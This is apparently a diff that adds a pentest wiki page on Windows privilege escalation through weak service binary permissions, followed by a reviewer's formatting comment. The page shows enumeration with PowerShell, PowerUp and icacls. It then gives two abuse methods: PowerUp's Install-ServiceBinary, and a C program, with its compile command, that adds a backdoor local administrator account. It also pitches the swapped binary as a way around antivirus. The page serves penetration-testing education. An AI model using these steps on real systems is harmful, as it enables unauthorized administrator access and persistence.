docs/src/infra/privilege-escalation/windows/weak-service-permissions.md

```diff
@@ -1,2 +1,129 @@
+
+For the enumeration can be done with Powershell, first using native Powershell commands (Living off the Land) But also with [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1). The main difference between the two is on the result PowerUp is able to tell you if a service is vulnerable or not while PowerShell just lists the Binary Services. In this example the **aniService** service is misconfigured and vulnerable to this attack.
+
+```powershell
+# USING POWERSHELL
+> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
+
+# USING POWERUP
+> Invoke-AllChecks
+[*] Checking service executable and argument permissions...
+
+
+ServiceName    : aniService
+Path           : C:\Program Files\AniService\ani.exe
+ModifiableFile : C:\Program Files\AniService\ani.exe
+StartName      : LocalSystem
+AbuseFunction  : Install-ServiceBinary -ServiceName 'aniService'
+```
+
+If you have identified your vulnerable binary with a tool like PowerUp or even Winpeas, you can check the permissions of this binary with **icacls.exe**. The most interesting permissions are (F) and (M) if they are related to a group such as `Everyone:` or a local user for exemple. 
+```powershell
+> icacls "C:\Program Files\AniService\ani.exe"
+C:\Program Files\AniService\ani.exe AUTORITÉ DE PACKAGE D’APPLICATION\TOUS LES PACKAGES D’APPLICATION:(RX)
+                                    AUTORITÉ DE PACKAGE D’APPLICATION\TOUS LES PACKAGES D’APPLICATION RESTREINTS:(RX)
+                                    AUTORITE NT\Système:(F)
+                                    BUILTIN\Administrateurs:(F)
+                                    Tout le monde:(F)
+                                    BUILTIN\Utilisateurs:(RX)
+```
+
+In the current practical case the executable permission (F) on the group "Everyone", but if the permission was set in (M) it would also have been possible to abuse. Thanks to this bad configuration the attacker can simply replace the binary with another malicious one. it is possible to use PowerUp for automated task.
+```powershell
+> Install-ServiceBinary -ServiceName 'aniService' -User vador -P "D4rkIsD@rk"
+```
+
+Once the command is launched it will just need to **restart the service** to be sure that the abuse is well worked. 
+
+The second method consists of creating yourself your malicious binary that can have advantages including the bypass of the AV detection. Here is a simple C code that will execute a system windows command (You can of course replace the system command with another.).
+```C
+#include <stdlib.h>
+int main ()
+{
+int i;
+    i = system("net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add");
+return 0;
+}
+
+# COMPILE THE CODE
+i686-w64-mingw32-gcc <CODE.c> -lws2_32 -o <FILE.exe>
```

Comment:
Please put this in a separate bash block and have the comment be standard text right before